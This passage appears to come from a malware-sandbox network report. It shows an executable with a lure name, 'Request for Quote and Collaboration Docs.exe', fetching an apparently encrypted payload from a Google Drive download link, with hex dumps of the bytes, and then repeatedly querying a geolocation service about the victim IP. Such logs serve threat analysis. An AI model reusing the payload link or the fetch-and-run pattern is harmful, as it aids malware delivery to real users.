                                                                                        Location: https://drive.usercontent.google.com/download?id=1lgdW6QYobumFhnMWuJXQIs7wQ7eWkw80&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'nonce-TZcpsqe5oU54bmWngV9-cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.949932142.250.181.974432052C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-03 14:23:54 UTC258OUTGET /download?id=1lgdW6QYobumFhnMWuJXQIs7wQ7eWkw80&export=download HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-03 14:23:57 UTC4934INHTTP/1.1 200 OK
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Security-Policy: sandbox
                                                                                        Content-Security-Policy: default-src 'none'
                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                        X-Content-Security-Policy: sandbox
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Content-Disposition: attachment; filename="BrlDOMPNFrchnivLSKdlkruQT177.bin"
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Credentials: false
                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 277568
                                                                                        Last-Modified: Tue, 03 Dec 2024 00:04:54 GMT
                                                                                        X-GUploader-UploadID: AFiumC4rPOguvGOm9LMVHb3B3nqLXQlOGnLV4wHiK0VzxiGZQrnTQo20kUiPPoOTbi-5xMwHThRcIf80_Q
                                                                                        Date: Tue, 03 Dec 2024 14:23:56 GMT
                                                                                        Expires: Tue, 03 Dec 2024 14:23:56 GMT
                                                                                        Cache-Control: private, max-age=0
                                                                                        X-Goog-Hash: crc32c=qZ1emA==
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close
                                                                                        2024-12-03 14:23:57 UTC4934INData Raw: c6 bb 40 75 7f 32 d3 c4 b9 14 78 1c 64 da 8f 47 97 20 bb 97 4c f2 2f c2 d2 0a b8 0a 7e 84 bf 9b 46 e8 4d 2c fa 9d e1 26 55 e1 f0 53 08 4a 27 60 d7 f4 de 11 59 3f 40 d7 34 dc 25 bc 13 5d e4 c2 28 0b e8 db 67 5a 28 f6 c7 92 c5 b4 1c b2 2c 7a 1e c3 f0 f9 44 5e 07 85 f1 62 4c d8 84 ea d3 20 80 04 f2 85 3f 4f 69 53 57 be 5d 5a 39 82 a4 9a 85 ef 5a 55 13 3a ad 0f 37 c2 41 df 84 1a dd 34 1a 5d 69 10 c5 f3 48 29 f5 e0 ab d9 31 a0 e6 15 81 34 69 44 25 9e 23 62 53 0c c4 c9 0a 21 29 60 f5 3d 6d bb 81 9d e0 2d f0 c3 c3 44 87 b4 6a 2b 04 f2 f6 1e 22 1b f4 37 1c 65 e0 4d 3c 89 4e ac d0 f5 fb 50 04 57 32 77 de 32 f2 98 39 45 8d 3e db ea 84 b2 45 af b2 f1 8a b5 7e 4a cb 03 46 21 bb 5f 4e ed 39 39 76 a0 37 0d 3a f4 75 94 84 9c 4e 59 16 a0 77 85 0f e8 35 b3 a0 90 3b 3d 9e
                                                                                        Data Ascii: @u2xdG L/~FM,&USJ'`Y?@4%](gZ(,zD^bL ?OiSW]Z9ZU:7A4]iH)14iD%#bS!)`=m-Dj+"7eM<NPW2w29E>E~JF!_N99v7:uNYw5;=
                                                                                        2024-12-03 14:23:57 UTC4834INData Raw: a7 b4 e3 47 f2 7a a6 e9 f0 f9 05 12 07 85 b3 62 4c d8 de ea d3 20 b7 05 f2 85 ae 4e 69 53 59 be 5d 5a 39 82 a4 9a 87 ef 5a 55 be 3b ad 0f 2c c2 41 df cc 1b dd 34 1a 42 d3 1e c5 47 41 e4 d4 58 aa 95 fd 81 b2 7d 3f 46 49 34 8f f0 44 10 22 61 e4 aa 2e 4f 47 0e 9a 2d 0c de 10 ef 95 43 c3 aa ad 75 c3 fb 11 68 69 9d 98 70 0b 3e a3 3d 38 6f e3 22 60 89 4e a6 ef d4 fb 50 42 56 36 68 17 3a 3d fe 39 44 e2 5b db ea 8e b2 a2 a8 df 96 81 b4 24 4d a4 42 42 21 b1 24 26 ed 39 33 7a a0 7a 20 3e f4 7f a7 80 9c 5f 3d 1a b7 04 ef 4f e8 3f 80 a5 90 2a 3a ed f6 f3 de c6 68 4b 74 35 70 9c 73 6c 64 0e 53 24 a3 41 18 ab 7b f2 36 38 6f ae 13 6e 5a e2 f6 b2 57 55 3d 10 5e 53 b9 0f 14 d5 78 4c 79 30 c5 3c c9 43 b1 3b 33 e0 25 a1 dd c8 50 34 3f 7d e8 2b fc 95 60 be 44 64 9d 98 50 38
                                                                                        Data Ascii: GzbL NiSY]Z9ZU;,A4BGAX}?FI4D"a.OG-Cuhip>=8o"`NPBV6h:=9D[$MBB!$&93zz >_=O?*:hKt5psldS$A{68onZWU=^SxLy0<C;3%P4?}+`DdP8
                                                                                        2024-12-03 14:23:57 UTC1318INData Raw: f2 c5 96 b9 3d 10 9a b4 a7 a4 82 81 fb a4 ec 15 65 51 78 a5 56 5a 28 f2 b1 07 c7 b4 93 5b 04 fb a6 c3 fa ef ba 5f 14 83 a0 64 75 1b 86 ea d3 5e af 04 f2 81 4d 2e 79 53 27 a8 75 db 39 82 ae 8c 7b ee 49 52 02 3d 94 3f 36 c2 41 df 10 e4 db 09 14 42 d5 6d 05 47 41 ee fc 99 aa 95 f6 81 c1 bf e8 47 43 27 5f e0 4c 6e 08 61 e4 ae 18 8c 47 0f 8b 72 cb de a1 e5 95 52 d8 c5 68 64 c3 f1 47 36 69 9d 96 14 ca 16 f9 37 38 74 e8 3f bb 99 4e dc a8 04 fb 50 42 24 ac 67 07 c7 4a a5 39 45 87 51 1c ea 84 b8 a5 be b8 ed 0c f4 2e 4a ca 00 54 53 80 44 4e 9d 9b 1c 61 88 bd 49 3e fe d7 91 9c ee 1b 36 12 d0 d5 a0 56 96 0d 93 a0 94 99 1a 84 ef 8a d1 cc 0b ef 40 28 0c d9 1f 6c 60 a6 76 e6 df c6 06 ad 27 58 0f 4b 00 af 19 01 98 e2 2a a9 53 44 6c 10 5e 5d c7 18 1a d5 63 5a 5c 46 e5 39
                                                                                        Data Ascii: =eQxVZ([_du^M.yS'u9{IR=?6ABmGAGC'_LnaGrRhdG6i78t?NPB$gJ9EQ.JTSDNaI>6V@(l`v'XK*SDl^]cZ\F9
                                                                                        2024-12-03 14:23:57 UTC1390INData Raw: 10 1a 3b e4 aa 61 52 ca 4f 81 1d 0e fb b7 9d ae 4c d0 da 0f 41 d4 d3 8d 0b 69 97 30 5e 14 64 ac 32 38 15 42 68 25 f7 76 ac 80 b4 59 75 52 24 48 78 07 c7 c0 db 22 3b a7 3e db ee 26 97 b9 dd 37 ff 81 c4 8c 62 be 25 42 2b d4 17 4e ed 33 2a 57 bb 84 09 3e f4 74 91 92 ee af 2b 12 d0 d5 a0 58 c0 81 93 a0 9a 99 1a 86 ef a6 d1 cc 0b ef 40 2a 0c cb 1f 6c 60 a6 76 e0 df 70 0a ad 27 58 0f 4b 00 af 19 7d 72 f4 02 d5 53 3a 5a 10 7e 59 b8 d1 1a fd 1e 49 55 32 d4 39 d8 7d b1 3b 3d f1 d8 0d dc db 41 40 6d 6a f9 2f 97 bc 29 be 4e 6e 50 b3 06 16 fe 23 2e 81 87 c6 56 31 78 95 8e 61 45 01 4e 70 96 86 c9 37 e9 7c ab ee ca 83 c4 d7 f0 37 8e 47 a5 26 1c b4 53 d6 59 a6 85 eb 7c 63 3a d6 b8 2f e3 b4 15 72 d9 5d a7 aa 13 1c 4c 77 f6 9e f6 57 a3 73 33 74 01 4b 6b b7 30 65 b5 8d f2
                                                                                        Data Ascii: ;aROLAi0^d28Bh%vYuR$Hx";>&7b%B+N3*W>t+X@*l`vp'XK}rS:Z~YIU29};=A@mj/)NnP#.V1xaENp7|7G&SY|c:/r]LwWs3tKk0e
                                                                                        2024-12-03 14:23:57 UTC1390INData Raw: e1 da 73 e7 5d 12 a9 b9 c2 f4 12 62 39 75 54 6d 45 ec 58 e9 95 ea 3d ae d6 ab ee ca 5d ba fc f0 37 f4 03 48 26 18 cc d5 d3 48 d0 fc 12 fd 63 30 cd a9 be 31 a7 31 69 fd 0f c7 b7 9e 58 3f be f7 bb ea 36 90 02 02 04 a3 6a 0e 0a 86 65 c5 91 78 6b 23 7d 73 f0 67 a5 4d a1 b9 ab d5 ef 71 48 a8 2f b1 95 08 6f de 41 5e 2a e2 e3 55 e3 d0 3e 96 06 9d b4 61 bd e8 54 1b 88 59 d5 a8 43 4d 71 7f 15 84 28 8d 4b d7 fa 27 cf 8e bb 22 c8 83 14 87 0d 2e d9 03 b4 f7 86 fd 72 22 fb 8d 6f d5 0b be 9d 8c 40 df 0f 34 1b d8 14 a6 0f 5a 6b e4 e8 12 ad d3 af eb 37 32 88 c2 96 2b 8d 91 4d d6 a6 c3 8e 87 49 48 d9 45 9b 5a 05 bf df 1c af db a3 2b 91 39 bd 11 06 28 53 89 eb eb da b9 89 39 1a 1b c1 5e 98 7b 18 db 31 01 6c fc a4 d0 58 e2 ff ae 14 df bd 41 88 82 72 65 9a f7 2a b5 15 11 cc
                                                                                        Data Ascii: s]b9uTmEX=]7H&Hc011iX?6jexk#}sgMqH/oA^*U>aTYCMq(K'".r"o@4Zk72+MIHEZ+9(S9^{1lXAre*
                                                                                        2024-12-03 14:23:57 UTC1390INData Raw: 3a c9 f3 af ed 26 ec e6 fb be 1f 89 fe a9 c5 ac c9 d4 bf 48 48 a3 8d b3 db 05 bf ab 3f 51 d8 ad 5f 3d 99 ba 61 10 7e e1 89 eb e5 be d2 8a 2a 61 1c e2 e6 53 7a 12 cd b1 2b 67 fb 99 dc b2 e2 ff b0 d7 86 c3 77 89 aa 5b 17 85 ec 58 dc 13 39 3d 25 6f 52 e8 50 f5 0a b6 78 47 b6 72 26 1f 55 e1 59 ab 43 0e 20 b6 6a 8f a0 7c e1 62 69 f0 e2 bc 1e 87 31 4f f0 fa 18 08 48 da 4d f9 22 c7 53 4d 66 47 e4 c7 2f f9 4d 14 a0 5b 3a 2a a8 5b 6c 8d 84 02 01 da b8 21 ec 96 75 30 d9 92 4b 3d d1 c0 08 96 1a 09 25 bb 06 a8 05 e4 90 f1 b5 f5 60 29 3f e7 97 a6 50 42 a5 12 a1 dc 04 59 f7 80 b8 2c 7d 7c 1e 71 f7 2f 03 be 2f 04 c7 16 3f 23 d6 0d 7e 37 b9 88 58 5e 75 88 0e 47 13 1b 64 df 00 5e ed 9e 41 a4 e6 68 ac ea 66 8e 22 9f 6c e8 c1 63 38 c7 eb a5 82 e7 c2 9e f9 22 77 08 51 12 fe
                                                                                        Data Ascii: :&HH?Q_=a~*aSz+gw[X9=%oRPxGr&UYC j|bi1OHM"SMfG/M[:*[l!u0K=%`)?PBY,}|q//?#~7X^uGd^Ahf"lc8"wQ
                                                                                        2024-12-03 14:23:57 UTC1390INData Raw: 3a 29 99 36 c9 2b 48 a5 30 e8 c1 15 4f 85 a6 f8 2c 77 7d 2a 7d ea 8c 16 be 55 a6 f3 1a 78 4c d6 0d 7e 95 9c a8 e9 0b 7a 88 7e e5 20 2a 6c e7 00 54 e9 1c 64 b2 94 11 8b 9d 16 2c 0d 84 0e 79 81 63 3c a9 20 b3 f0 79 6b bb 95 78 03 1c 51 64 fe e4 3c 03 5e 97 d0 d0 b6 cf bb c4 1c 70 aa eb 8a 9a b3 93 21 65 72 b7 de c2 9a ff ae bd 0c 39 0a e7 b7 be 47 0c 6b 63 1c 2c 58 97 5e 2b 8b 4e e9 25 99 36 d0 f9 03 10 e0 ba 5c e7 c4 c0 d0 61 81 83 db 55 43 76 d6 4a f2 2d 2a da 96 ec 2e 09 bd 78 bc b8 31 95 84 f0 f8 d1 6c 9c 4f 49 fb 11 82 e3 20 b5 94 eb ff fb 9e 5a 84 fc 26 f6 f9 cd ec 46 10 5c f8 03 2a 8b 2b 7f ae 1f 65 53 30 57 ca 83 33 18 f3 f5 8e a7 ec 0d d9 41 93 d8 88 76 30 4c 1a 4f 3a 6c 14 f5 86 0a 9f b0 94 ca e1 32 91 59 d6 11 fb dc 78 f1 27 cb 71 81 fa ba 70 1e
                                                                                        Data Ascii: :)6+H0O,w}*}UxL~z~ *lTd,yc< ykxQd<^p!er9Gkc,X^+N%6\aUCvJ-*.x1lOI Z&F\*+eS0W3Av0LO:l2Yx'qp
                                                                                        2024-12-03 14:23:57 UTC1390INData Raw: 88 f9 51 6d 53 fe f5 8b 3e 49 84 f5 0e d9 b9 a2 ed 4c 62 e3 ea df 84 b0 4c 57 9a 19 74 47 32 47 e2 ef 51 18 f5 ff 8e 45 eb 0d d9 64 bb ec f6 44 3a 5f 01 3d 87 0c 14 85 9a fc 1e b0 94 c0 f7 b2 a4 4a d3 04 8c 70 b0 f3 57 dd 27 2f fa ba 7e 7a 85 11 b7 62 65 1d d6 80 48 fd e3 f4 8e 0c c6 0b d8 f6 d0 df df 0a a5 53 94 a9 64 62 b6 e0 7e 36 b7 53 83 02 0a 0d c0 e2 71 ff a0 ff 8e 4d 72 e7 7c 4f 5c 1e db fb d9 2c 5b 3f c0 26 93 5f e3 f6 70 cc 08 06 70 35 65 f1 13 73 00 9a 32 94 81 ce dd b5 8f 1d 68 ea 28 f0 d5 3e 40 56 e6 a9 f6 5b d0 22 1c 47 ff 12 ef 3b 9e 3d 46 6b 32 f7 25 7a 5a 84 52 20 45 83 24 c1 c8 d7 4c d4 fc e6 4c e4 34 ce 5c 4e 8c 61 86 e3 56 aa 3a ce bc 83 f3 fe e7 0e d7 71 9a 30 cd 4a 55 6b 4d b3 c0 c6 91 b2 e7 b1 7d 07 94 09 6f e3 11 8a 31 90 44 87 40
                                                                                        Data Ascii: QmS>ILbLWtG2GQEdD:_=JpW'/~zbeHSdb~6SqMr|O\,[?&_pp5es2h(>@V["G;=Fk2%zZR E$LL4\NaV:q0JUkM}o1D@
                                                                                        2024-12-03 14:23:57 UTC1390INData Raw: 2f 9a bf 0c 43 2d 1f ae 49 af 34 29 dc 90 d2 34 04 6b 83 4f a9 a7 a6 38 b2 d8 d7 3e 8d 48 ce 49 46 11 d3 1b a6 8c 61 86 52 51 a9 c5 db b3 83 82 79 d4 65 ee 5e 9a 40 6b cd 67 59 8b 82 c3 cc 43 35 da d8 56 28 94 79 c9 64 2d e8 7b a5 52 83 92 94 07 8b 78 3f 5d 37 cb ba 96 49 d8 f0 99 b0 6f 75 ba 8b e2 a2 1d d0 b5 64 34 a4 40 1c 0a e9 4d f2 af 25 4a 2f 84 07 65 a2 9a 1f 04 ad 84 91 06 25 b3 a7 b1 cf c8 04 30 7a fb b5 7b b8 80 27 8d c7 05 c7 22 23 19 37 6b f2 e7 67 8d 02 2f 16 e7 eb 22 b4 6e 42 56 b6 68 f8 f5 e9 09 91 bd b8 9d e5 8d f7 97 d8 a3 71 d0 85 8a 4e 76 8c f1 12 21 71 b2 f1 cb d3 ec 52 67 ff e0 5c 11 e7 1f 87 f3 0c b4 14 97 e3 41 c1 cc a5 4b 77 1d 3c 1c 1e 7e e7 a6 9b ed fa 20 e0 fc f9 16 ed 8c 12 f1 c5 ec 08 1d 0b cc f6 a7 a4 8c fe 80 be 9e 20 73 51
                                                                                        Data Ascii: /C-I4)4kO8>HIFaRQye^@kgYC5V(yd-{Rx?]7Ioud4@M%J/e%0z{'"#7kg/"nBVhqNv!qRg\AKw<~ sQ
                                                                                        2024-12-03 14:23:57 UTC1390INData Raw: ed 70 ff e1 cf 4f 8b f0 da 93 7e 59 9b 9f f3 25 1c 58 8f bc c1 31 66 52 67 f4 c5 4a 48 c5 09 96 92 b8 fe c9 bf 57 4b c1 c6 16 7f 11 51 69 13 1a 26 8e 83 82 99 ad ec e0 f8 51 33 e6 ef 5d c8 c5 9c ae 46 2b b2 d6 a3 d7 34 5c a5 a8 83 d8 65 51 72 db 75 4b 39 fa ac 5c c5 b4 e9 4d 3d 76 c9 0c f0 f9 4e 5e d9 95 94 4a 78 d8 84 e0 c0 33 80 2c 90 85 3f 45 b7 53 57 be 5d 5a 39 fc 91 9a 85 eb 28 c0 11 3a dd 19 1f 43 41 df 0e 0c 23 35 07 56 c2 0a fc bc 40 e4 d4 45 27 d5 fc 81 b3 58 fe 35 60 22 57 81 e6 35 25 49 50 aa 6b 45 e5 2a 99 6f 5a d1 a1 9f 37 66 c9 d4 95 64 c3 ff 9b 2e 73 ef a3 78 0c 66 5b 18 23 1b c0 4d 3c 8d ec 89 9c c2 ce 46 48 26 93 5f 72 b7 62 f4 2a 50 f3 08 db ea 80 c0 ba be b0 80 97 9c af 4a cb 2f 54 df ba 58 58 fc 2f 00 a0 a0 09 49 28 dc 03 b4 84 96 4e
                                                                                        Data Ascii: pO~Y%X1fRgJHWKQi&Q3]F+4\eQruK9\M=vN^Jx3,?ESW]Z9(:CA#5V@E'X5`"W5%IPkE*oZ7fd.sxf[#M<FH&_rb*PJ/TXX/I(N


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.949953172.67.177.1344432052C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-03 14:24:02 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                        Host: reallyfreegeoip.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-03 14:24:03 UTC882INHTTP/1.1 200 OK
                                                                                        Date: Tue, 03 Dec 2024 14:24:03 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=31536000
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 113266
                                                                                        Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VfKVXUR2KfxJL%2Bldx3qVPrcsyJkmcHH5gV0TGtAM6uiur%2Fwjoa4GWCs6fUJVmRL%2Fte2j2vWy3yVKDfvQd7QpQok1xcI%2Fd19%2FUAAcp8nXUkFLoC%2BSsS583DL3X0RCVO20iEtahjyE"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8ec437d2bb0743b2-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1761&rtt_var=682&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1578378&cwnd=236&unsent_bytes=0&cid=8006175c31832fa9&ts=622&x=0"
                                                                                        2024-12-03 14:24:03 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                        Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.949959172.67.177.1344432052C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-03 14:24:05 UTC61OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                        Host: reallyfreegeoip.org
                                                                                        2024-12-03 14:24:05 UTC876INHTTP/1.1 200 OK
                                                                                        Date: Tue, 03 Dec 2024 14:24:05 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=31536000
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 113268
                                                                                        Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3isuQCGfBDmD7qDNneIHg9Cc3A1oXmqoAGVm5%2BVnXv6LcJ0tEDimGzPPiZVuoIiP3GyqYJAzgRAme7SoI9ZGzN5hMICxK7zLNesB2OnJr49nqlDI3K2Iiw7%2Fp%2BeCHr7KXmpBp913"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8ec437e19b2f434b-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2266&min_rtt=2263&rtt_var=855&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1275666&cwnd=243&unsent_bytes=0&cid=d1925e2735e12561&ts=483&x=0"
                                                                                        2024-12-03 14:24:05 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                        Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.949968172.67.177.1344432052C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-03 14:24:08 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                        Host: reallyfreegeoip.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-03 14:24:08 UTC874INHTTP/1.1 200 OK
                                                                                        Date: Tue, 03 Dec 2024 14:24:08 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=31536000
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 113271
                                                                                        Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s4g7eB9xEzhyqi05mtUdk%2FP7VsI%2BiNN1vwGrCDayAoOltJgZWascraoH3tGXvEPIj8ruWTp8QpZRYbCkjHvSadGL2jNMO5mvxNZlLYCWj8lnpIAGAUGpN9WOFz2iVnAqudfwpv3y"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8ec437f5b847de94-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1541&rtt_var=598&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1894873&cwnd=221&unsent_bytes=0&cid=55e68a3d975f0c47&ts=471&x=0"
